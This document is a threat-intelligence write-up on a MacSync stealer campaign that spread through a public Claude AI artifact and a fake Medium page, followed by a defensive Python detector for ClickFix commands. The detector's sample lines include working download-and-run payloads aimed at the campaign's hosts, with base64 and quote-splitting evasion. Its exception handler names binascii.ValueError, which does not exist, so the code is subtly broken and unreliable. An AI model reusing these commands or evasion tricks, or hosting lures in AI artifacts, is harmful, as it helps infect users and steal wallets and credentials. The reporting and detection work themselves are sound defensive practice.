a sophisticated malware distribution campaign that abuses legitimate platforms and sponsored Google search results to target macOS users. With more than 15,000 users already exposed to the malicious content, the campaign uses Medium articles and Claude AI's public artifact feature to distribute the MacSync information stealer. Both of the campaign's variants rely on the ClickFix social-engineering technique, which tricks users into running the malicious commands themselves.
[Figure: 15,000 possible victims (source: Twitter)]

When users search for "Online dns resolver," the first variant appears as a sponsored Google search result that leads them to a public Claude AI artifact titled "macOS Secure Command Execution." Posing as a genuine security tool, this phony tutorial instructs users to paste a base64-encoded command into their Terminal application.
When the command runs, a loader for the MacSync stealer is downloaded into the temporary directory as /tmp/osalogging.zip and launched. To avoid detection, the malware spoofs a macOS browser User-Agent string and uses a hardcoded authentication token and API key to connect to its command-and-control server at a2abotnet[.]com/dynamic. The actual data exfiltration is handled by Apple's scripting tool, osascript, which receives the server response directly.
MacSync targets private data such as cryptocurrency wallets, browser data, and keychain credentials.

[Figure: malicious website (source: Twitter)]

According to cybersecurity researchers at Moonlock Lab, the stolen data is compressed into a zip file and sent via HTTP POST requests to a2abotnet[.]com/gate.
The malware uses a chunked upload mechanism with exponential backoff and up to eight retry attempts to ensure that larger data sets are exfiltrated successfully. To hide its tracks, it deletes the staging files once the upload is finished.

The second variant uses a fake Medium article hosted at apple-mac-disk-space.medium[.]com to target users searching for "macos cli disk space analyzer." Posing as the official Apple Support Team, the article presents a similar ClickFix payload with extra obfuscation layers. The command retrieves the malicious payload from raxelpak[.]com and evades basic pattern-matching detection by using string-concatenation tricks such as cur""l, which hides the curl keyword from simple signature checks. Both variants show the threat actors' command of social engineering and evasion tactics.
By taking advantage of reputable platforms like Medium and Claude AI, together with Google's advertising network, attackers reach a larger audience while appearing legitimate. The campaign highlights the growing practice of malware operators exploiting trusted services to distribute malicious content and circumvent conventional security measures.

IOC

Indicator Type   Indicator                            Description
Domain           a2abotnet[.]com                      Command-and-control server
Domain           raxelpak[.]com                       Payload hosting domain
Domain           apple-mac-disk-space.medium[.]com    Fake Apple support article
File path        /tmp/osalogging.zip                  Data staging file
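As an added example that is not part of the article or of Moonlock Lab's research, the following Python script shows how a defender could screen shell command lines collected from macOS endpoint telemetry for the two ClickFix traits described above (a base64 blob decoded and piped into a shell, and quote-concatenation such as cur""l that hides the curl keyword) and then match the decoded content against the IOC table. The sample command lines, the URL path under raxelpak[.]com and the finding names are constructed for the demonstration; only the domains, the /dynamic path and the staging file path come from the article.

```python
import base64
import binascii
import re

# Indicators copied from the article's IOC table (kept defanged as data).
IOC_DOMAINS = {
    "a2abotnet[.]com": "command-and-control server",
    "raxelpak[.]com": "payload hosting domain",
    "apple-mac-disk-space.medium[.]com": "fake Apple support article",
}
IOC_PATHS = {"/tmp/osalogging.zip": "data staging file"}

# An empty "" or '' squeezed inside a word, e.g. cur""l -> curl.
_EMPTY_QUOTES = re.compile(r"""(?<=\S)(""|'')(?=\S)""")
# base64 -d / -D / --decode whose output is piped into sh, bash or zsh.
_B64_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode|-D)\b[^|]*\|\s*(?:ba|z)?sh\b")
# curl/wget output piped straight into a shell.
_FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b")
# Candidate base64 blobs: long runs of the base64 alphabet plus optional padding.
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def refang(indicator: str) -> str:
    """Turn a defanged indicator (a[.]b) back into matchable form (a.b)."""
    return indicator.replace("[.]", ".")


def deobfuscate(cmd: str) -> str:
    """Strip empty-string concatenation so that cur""l reads as curl."""
    return _EMPTY_QUOTES.sub("", cmd)


def decode_blobs(cmd: str) -> list:
    """Return every base64 token in cmd that decodes to valid UTF-8 text."""
    layers = []
    for match in _B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            layers.append(raw.decode("utf-8"))
        except (binascii.ValueError, binascii.Error, UnicodeDecodeError):
            continue
    return layers


def analyze_command(cmd: str) -> dict:
    """Flag ClickFix-style traits and IOC hits in one captured command line."""
    findings, iocs = [], []

    def add(finding):
        if finding not in findings:
            findings.append(finding)

    normalized = deobfuscate(cmd)
    if normalized != cmd:
        add("quote-concatenation obfuscation")

    # Layer 0 is the visible command; further layers are decoded base64 blobs.
    layers = [normalized] + decode_blobs(normalized)
    for layer in layers:
        if _B64_TO_SHELL.search(layer):
            add("base64 payload piped to shell")
        if _FETCH_TO_SHELL.search(layer):
            add("remote fetch piped to shell")
        for domain, desc in IOC_DOMAINS.items():
            if refang(domain) in layer and (domain, desc) not in iocs:
                iocs.append((domain, desc))
        for path, desc in IOC_PATHS.items():
            if path in layer and (path, desc) not in iocs:
                iocs.append((path, desc))

    return {"findings": findings, "iocs": iocs, "decoded_layers": len(layers) - 1}


# Constructed telemetry: one benign line, one modelled on each campaign variant.
_INNER = "curl -fsSL http://a2abotnet.com/dynamic -o /tmp/osalogging.zip"
SAMPLE_COMMANDS = [
    "curl -s https://example.com/api | jq .",
    "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -D | bash",
    'cur""l -fsSL http://raxelpak.com/dsa | s""h',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(line[:60], "->", analyze_command(line))
```

The script only classifies command lines it is given; in practice the input would be the process-execution events an EDR or the unified log records for Terminal-spawned shells. Decoding the blob before matching is what makes the /dynamic URL and the staging path visible, since neither string appears in the command the victim actually pastes.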